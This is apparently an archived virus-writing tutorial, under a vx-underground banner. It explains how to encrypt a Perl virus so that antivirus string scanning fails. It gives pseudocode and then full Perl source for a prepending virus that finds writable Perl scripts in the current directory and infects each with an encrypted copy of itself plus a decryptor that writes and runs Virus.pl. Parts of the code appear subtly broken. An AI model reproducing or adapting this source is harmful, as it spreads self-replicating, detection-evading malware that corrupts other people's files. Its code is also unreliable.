,, MMP""MM""YMM `7MM P' MM `7 MM MM MMpMMMb. .gP"Ya MM MM MM ,M' Yb MM MM MM 8M"""""" MM MM MM YM. , .JMML. .JMML JMML.`Mbmmd' `7MMF' `7MF' `7MMF' `7MMF' `MA ,V MM MM VM: ,V `7M' `MF' MM MM .gP"Ya ,6"Yb.`7M' `MF'.gP"Ya `7MMpMMMb. MM. M' `VA ,V' MMmmmmmmMM ,M' Yb 8) MM VA ,V ,M' Yb MM MM `MM A' XMX MM MM 8M"""""" ,pm9MM VA ,V 8M"""""" MM MM :MM; ,V' VA. MM MM YM. , 8M MM VVV YM. , MM MM VF .AM. .MA..JMML. .JMML.`Mbmmd' `Moo9^Yo. W `Mbmmd'.JMML JMML. ,, ,, ,, .g8"""bgd `7MM `7MM mm db .dP' `M MM MM MM dM' ` ,pW"Wq. MM MM .gP"Ya ,p6"bo mmMMmm `7MM ,pW"Wq.`7MMpMMMb. MM 6W' `Wb MM MM ,M' Yb 6M' OO MM MM 6W' `Wb MM MM MM. 8M M8 MM MM 8M"""""" 8M MM MM 8M M8 MM MM `Mb. ,'YA. ,A9 MM MM YM. , YM. , MM MM YA. ,A9 MM MM `"bmmmd' `Ybmd9'.JMML..JMML.`Mbmmd' YMbmd' `Mbmo.JMML.`Ybmd9'.JMML JMML. -- Contact -- https://twitter.com/vxunderground vxug@null.net
SnakeByte [ SnakeByte@kryptocrew.de ]

This tutorial describes how to use encryption in a perl virus, to make detection by simple string scanning useless or to reduce the scanstring, so anti virus companies have to implement a real emulation or heuristic for perl viruses.

Ok, let's start. I don't know if it is possible to write selfmodifying code in perl, but i think it isn't. So we have to use a different way than in asm viruses. The one I will describe here works the following. When infecting a file, we place the entire virus into a encrypted string and a decryptor after it, which decrypts the string and writes it to a file, which gets started afterwards. To make it more clear some pseudo code of a prepending, encrypted perl virus.

 # Virus Mark
 $Virus="encrypted virus"
 open file
 write virus into file
 close file
 start file
 [ .. infected host  ]

The Virus then does the following :

 open own file + read it into a string
 foreach $File (<*>)
 open file + check for perl and infection mark
 encrypt string
 write string and decryptor to the file
 close target file

Seems pretty easy, doesn't it ? Ok, let's get to the real code :

 # Encrypted Perl Virus by SnakeByte

 open(File,$0);                                 # open our file
 @Virus=<File>;                                 # to read ourselves
 $Virus=join("\n", @Virus);
 foreach $FileName(<*>) {
  if ((-r $FileName) && (-w $FileName) && (-f $FileName)) {
   open(File, "$FileName");
   if ((@Temp[0] =~ /perl/i ) or (@Temp[1] =~ /perl/i )) {
    if (@Temp[1] !~ "Virus") {
     $Key = int(rand(255));
     for ( $X = 0; $X < length($Virus); $X++ ){# Encrypt it
                                                # we get each char, convert it to
                                                # the Ascii Value and add the Key
      @Crypt[$X] = (ord(substr($Virus, $X, 1))) + ($Key);
     $VirString = join("!", @Crypt);            # all values get seperated by a !

     @Vir[0] = "\#\!\/usr\/bin\/perl";
     @Vir[1] = "# Encrypted Perl Virus by SnakeByte ";          # infection mark
     @Vir[2] = "\$Virus = \"$VirString\"\;";
     @Vir[3] = "\$Key = $Key\;";                                # key to decrypt
     @Vir[4] = "\@Virus = split(\"\!\", \$Virus)\;";
     @Vir[5] = "for ( \$X = 0\; \$X < (\@Virus)\; \$X++ ) { ";  # Decrypt Loop
     @Vir[6] = " \$Vir .= chr(\@Virus[\$X]-\$Key)\;";           # Decrypt Char
     @Vir[7] = "}\" ;
     @Vir[8] = "
open(File, \"\>Virus.pl\")\;";          # write encrypted
     @Vir[9] = "print File \$Vir\;";                    # string to a file
     @Vir[10] = "close(File)\;";
     @Vir[11] = "\$a = \`perl Virus.pl\`;";             # and start it

     $Temp = "@Vir\n@Temp";                     # put the Arrays together
     open(File, ">$FileName");                  # and write the infected
     print File $Temp;                          # file back to disk
    }           # infection mark check
   }            # infect end
  }             # filecheck end
 }              # foreach end searchloop